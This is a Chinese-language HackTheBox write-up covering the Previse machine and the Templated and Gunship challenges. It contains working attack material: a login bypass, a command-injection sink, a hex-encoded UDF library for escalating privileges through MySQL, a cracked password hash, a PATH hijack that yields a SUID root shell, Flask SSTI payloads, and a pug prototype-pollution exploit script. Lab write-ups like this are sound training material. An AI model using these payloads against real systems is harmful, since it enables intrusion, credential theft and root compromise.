HTB靶机每周练习系列--Previse+2Challenge

WriteUp 靶机 HTB
靶机
发布日期:   2021-11-30
更新日期:   2021-11-30
文章字数:   1.5k
阅读次数:  

HTB靶机每周练习系列–Previse+2Challenge

靶机–Previse

目标地址:10.10.11.104

NMAP扫描:

└─$ nmap -p- --min-rate=1000 -sT -T4 10.10.11.104                                                                       130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-28 08:03 EST
Warning: 10.10.11.104 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.104
Host is up (0.25s latency).
Not shown: 65525 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
6660/tcp  filtered unknown
8468/tcp  filtered unknown
10509/tcp filtered unknown
11881/tcp filtered unknown
15833/tcp filtered unknown
21436/tcp filtered unknown
32761/tcp filtered unknown
59640/tcp filtered unknown

80和22开着,应该就是个web的题目

image-20211128211112994

就一个登录页面,尝试sqlmap跑着注入。

同时注意页脚有相关社工信息 CREATED BY M4LWHERE ,可能会有用

sqlmap并没用跑出来,但是路径爆破出了东西,如下:

使用的dirbuster,搭配KALi自带字典,这里要注意可能其他字典就跑不出来

image-20211128211840808

访问这些链接都会重定向到登录页面,尝试使用burp拦截一下302跳转,可以看到返回了页面源码后才302,保存一下创建用户的表单,创建一个新用户,这里不成功

image-20211128214439621

通过burp拦截响应然后把302改成200 OK,页面成功显示注册用户页面,并且提交表单的时候采用同样的方式绕过检测来注册。

image-20211128215412898

在上传文件页面能拿到源码压缩包

源码审计发现一处可以RCE的点,直接利用弹shell回来

log.php 19行

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

image-20211128234716981

去读user.txt发现没权限,于是写一句话,上蚁剑连接,准备提权。

从下载的代码中的config.php文件中得知了数据库配置信息,用蚁剑连接测试一下,连接没问题,准备试试UDF提权。

image-20211129000953396

查询mysql插件目录:

show variables like '%plugin%';
/usr/lib/mysql/plugin/

写动态链接库进去

SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

失败,没权限写。去差用户表,查到用户名和密码,也就是前文提到的那个用户的信息,配合代码可以知道是加盐的md5.

数据库中用户、密码:

m4lwhere
$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.

去跑hashcat爆破:

hashcat.exe -a 0 -m 500 hash.txt --wordlist ..\wordlists\rockyou.txt

或者kali下的john

sudo john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

结果为:

ilovecody112235!

尝试ssh连接,成功登录,拿到user.txt

image-20211129013539425

接下来就是提权,查看一下当前用户的sudo权限

m4lwhere@previse:/usr/lib/mysql/plugin$ sudo -l                                                                           
[sudo] password for m4lwhere:                                                                                             
User m4lwhere may run the following commands on previse:                                                                  
    (root) /opt/scripts/access_backup.sh

文件内容:

#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz

分析/opt/scripts/access_backup.sh脚本,可以看到 直接调用了一些命令/二进制文件,可能存在“路径注入”漏洞。

该脚本间接运行gzip命令。这使得脚本容易受到 $PATH 操作的影响。我们可以使用它通过操作 $PATH 变量来获得 root shell。

我制作了一个与脚本(gzip)中调用的二进制文件同名的假二进制文件,其中是复制/bin/bash并赋予权限的脚本。我将 /tmp 添加到 $PATH 变量中,并且由于 $PATH 从左到右排列优先级,脚本将从 /tmp 文件夹运行 gzip 命令

m4lwhere@previse:/dev/shm$ cd /tmp

m4lwhere@previse:/tmp$ cat << EOF > gzip
> #!/bin/bash
> cp /bin/bash /tmp/c
> chmod u+s /tmp/c
> EOF

m4lwhere@previse:/tmp$ ls
gzip
systemd-private-853c08c1d8d946119f9837cdefc0a557-apache2.service-pm21Fe
systemd-private-853c08c1d8d946119f9837cdefc0a557-systemd-resolved.service-3c55o7
systemd-private-853c08c1d8d946119f9837cdefc0a557-systemd-timesyncd.service-nns0jM
vmware-root_848-2697663887

m4lwhere@previse:/tmp$ chmod +x gzip 

m4lwhere@previse:/tmp$ export PATH=/tmp:$PATH

m4lwhere@previse:/tmp$ sudo /opt/scripts/access_backup.sh 
[sudo] password for m4lwhere: 

m4lwhere@previse:/tmp$ ls
c
gzip
systemd-private-853c08c1d8d946119f9837cdefc0a557-apache2.service-pm21Fe
systemd-private-853c08c1d8d946119f9837cdefc0a557-systemd-resolved.service-3c55o7
systemd-private-853c08c1d8d946119f9837cdefc0a557-systemd-timesyncd.service-nns0jM
vmware-root_848-2697663887

m4lwhere@previse:/tmp$ ./c -p
c-4.4# whoami
root
c-4.4# cat /root/
.bash_history  .cache/        .local/        root.txt       .viminfo       
.bashrc        .gnupg/        .profile       .ssh/          
c-4.4# cat /root/root.txt 
b31cb56b0ceccb7ada693f49dec73d15

或者更改gzip内容为 chmod +d /bin/bash,变成suid文件也可以。

-p参数:

默认情况下 bash 在执行时,如果发现 euid 和 uid 不匹配,会将 euid(即 suid) 强制重置为uid 。如果使用了 -p 参数,则不会再覆盖。

Challenge - Templated

Can you exploit this simple mistake?

flask的服务,测试存在ssti

image-20211128202325373

找能利用的方法,如下:

http://178.62.107.125:30898/%7B%7B%22%22.__class__.__bases__[0].__subclasses__()%7D%7D
http://178.62.107.125:30898/%7B%7B%22%22.__class__.__bases__[0].__subclasses__()[133]%7D%7D

image-20211128203119879

http://178.62.107.125:30898/%7B%7B%22%22.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['__builtins__']['eval']('__import__(%22os%22).popen(%22ls%22).read()')%7D%7D

执行命令:读取flag

image-20211128203516785

Challenge - Gunship

CHALLENGE DESCRIPTION

A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world… all the wooing in the world to make you feel more lonely… this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶

题目附件给了源码,看了一下package.json中库的版本和代码,应该是原型链污染。

代码;

const path              = require('path');
const express           = require('express');
const pug                = require('pug');
const { unflatten }     = require('flat');
const router            = express.Router();

router.get('/', (req, res) => {
    return res.sendFile(path.resolve('views/index.html'));
});

router.post('/api/submit', (req, res) => {
    const { artist } = unflatten(req.body);

    if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
        return res.json({
            'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
        });
    } else {
        return res.json({
            'response': 'Please provide us with the full name of an existing member.'
        });
    }
});

module.exports = router;

package.json

{
    "name": "gunship",
    "version": "1.0.0",
    "description": "",
    "main": "index.js",
    "scripts": {
        "start": "node index.js",
        "dev": "nodemon .",
        "test": "echo \"Error: no test specified\" && exit 1"
    },
    "keywords": [],
    "authors": [
        "makelaris",
        "makelarisjr"
    ],
    "dependencies": {
        "express": "^4.17.1",
        "flat": "5.0.0",
        "pug": "^3.0.0"
    }
}

查资料知道是pug存在问题,参考如下文章:

https://blog.p6.is/AST-Injection/#Pug

构造exp:

import requests

TARGET_URL = 'http://139.59.165.154:31157'

# make pollution
r=requests.post(TARGET_URL + '/api/submit', json = {
    "artist.name":"Haigh",
    "__proto__.block": {
        "type": "Text", 
        "line": "process.mainModule.require('child_process').execSync('cat flag* > static/js/flag.js')"
    }
})
# execute
requests.get(TARGET_URL)
print(r.text)

访问js文件得到flag。

HTB{wh3n_lif3_g1v3s_y0u_p6_st4rT_p0llut1ng_w1th_styl3!!}
文章作者: LANVNAL
文章链接: https://lanvnal.com/2021/11/30/htb-ba-ji-mei-zhou-lian-xi-xi-lie-previse-2challenge/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 LANVNAL !
WriteUp 靶机 HTB
 上一篇
ESXI安装黑群晖DSM7 ESXI安装黑群晖DSM7
群里的同志们一直都有文件存储分享的需求,正好实验室一批服务器到位了,装个黑裙来“爽”一下,记录一下安装过程和踩的坑,不得不说性能比我的220+好多了
2021-12-08 other
服务器 踩坑记录
下一篇 
2021_西湖论剑WP_by玛卡巴卡开叮叮车来打CTF 2021_西湖论剑WP_by玛卡巴卡开叮叮车来打CTF
2021_西湖论剑WP_by玛卡巴卡开叮叮车来打CTF,广州大学、Nxe和0xE4联合站队,WP以及题目附件
2021-11-27 CTF
WriteUp CTF
  目录